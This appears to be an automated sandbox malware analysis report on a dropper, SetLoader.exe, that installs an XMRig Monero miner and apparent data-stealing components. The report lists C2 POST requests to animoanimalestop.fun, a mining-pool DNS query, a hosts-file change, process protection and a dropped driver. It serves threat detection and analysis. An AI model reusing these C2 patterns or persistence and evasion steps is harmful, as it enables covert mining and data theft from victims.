              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062E560 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0062E560
              Source: global trafficTCP traffic: 192.168.2.4:49745 -> 146.59.154.106:10343
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 208Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 101666Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 745Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 212Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 35Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 96804Host: animoanimalestop.fun
              Source: global trafficHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSIContent-Length: 35Host: animoanimalestop.fun
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: animoanimalestop.fun
              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
              Source: unknownHTTP traffic detected: POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 96Host: animoanimalestop.fun
              Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: w1.exe, 00000004.00000000.2038525410.0000000000B2C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
              Source: w1.exe, 00000004.00000000.2038525410.0000000000B2C000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.mozilla.org/editor/midasdemo/securityprefs.html
              Source: w1.exe, 00000004.00000003.2276868902.0000000000F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/%
              Source: w1.exe, 00000004.00000003.2282018670.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8r
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/C
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/G
              Source: w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/Y
              Source: w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/f
              Source: w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/m
              Source: w1.exe, 00000004.00000003.2223062248.0000000000F29000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun/y
              Source: w1.exe, 00000004.00000003.2251052982.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2268729226.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2306124438.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun:443
              Source: w1.exe, 00000004.00000003.2268209246.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2317476232.0000000007EF0000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2223062248.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun:443/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNH
              Source: w1.exe, 00000004.00000003.2277021614.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://animoanimalestop.fun:4438
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2318909011.0000000009B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: w1.exe, 00000004.00000002.2318909011.0000000009B6F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49744 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies the hosts file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess information set: 01 00 00 00
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess information set: 01 00 00 00

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
              Source: Process Memory Space: HealthTool.exe PID: 5628, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Drops large PE files
              Source: C:\Users\user\Desktop\SetLoader.exeFile dump: w1.exe.0.dr 834649568Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile dump: HealthTool.exe.5.dr 831071200Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeFile dump: WmiPrvSE.exe.41.dr 827374560Jump to dropped file
              PE file contains section with special chars
              Source: HealthTool.exe.5.drStatic PE information: section name: .2}k
              Source: HealthTool.exe.5.drStatic PE information: section name: .Zj[
              Source: HealthTool.exe.5.drStatic PE information: section name: .&T7
              Source: WmiPrvSE.exe.41.drStatic PE information: section name: .oU[
              Source: WmiPrvSE.exe.41.drStatic PE information: section name: .G&p
              Source: WmiPrvSE.exe.41.drStatic PE information: section name: .>n>
              Uses powercfg.exe to modify the power settings
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000000140001394 NtQueryKey,67_2_0000000140001394
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00617FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00617FD3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeFile created: C:\Windows\TEMP\kzezoxxlsgop.sys
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_jxjnuw3x.cmi.ps1
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0061F9630_2_0061F963
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006199060_2_00619906
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00612FCB0_2_00612FCB
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006440440_2_00644044
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006260F70_2_006260F7
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006221250_2_00622125
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006291110_2_00629111
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006282D00_2_006282D0
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0061E3940_2_0061E394
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006214760_2_00621476
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006264450_2_00626445
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062976F0_2_0062976F
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006377380_2_00637738
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006379670_2_00637967
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006209490_2_00620949
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062EA070_2_0062EA07
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00613AB70_2_00613AB7
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063FA900_2_0063FA90
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00614C6E0_2_00614C6E
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00628C7E0_2_00628C7E
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00625E860_2_00625E86
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063FF3E0_2_0063FF3E
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00620FAC0_2_00620FAC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_03470D4A4_2_03470D4A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_03470F4A4_2_03470F4A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_0347135A4_2_0347135A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_0347EF3A4_2_0347EF3A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_0347EDA84_2_0347EDA8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_03480E4A4_2_03480E4A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_034CD25A4_2_034CD25A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_03470C1A4_2_03470C1A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_034CD0FA4_2_034CD0FA
              Source: C:\Windows\System32\conhost.exeCode function: 67_2_000000014000316067_2_0000000140003160
              Source: C:\Windows\System32\conhost.exeCode function: 67_2_00000001400026E067_2_00000001400026E0
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\kzezoxxlsgop.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: String function: 00631D60 appears 31 times
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: String function: 00631590 appears 57 times
              Source: w1.exe.0.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
              Source: w1.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: SetLoader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: Process Memory Space: HealthTool.exe PID: 5628, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: classification engineClassification label: mal100.adwa.spyw.evad.mine.winEXE@99/15@2/2
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00617BFF GetLastError,FormatMessageW,0_2_00617BFF
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0062C652
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
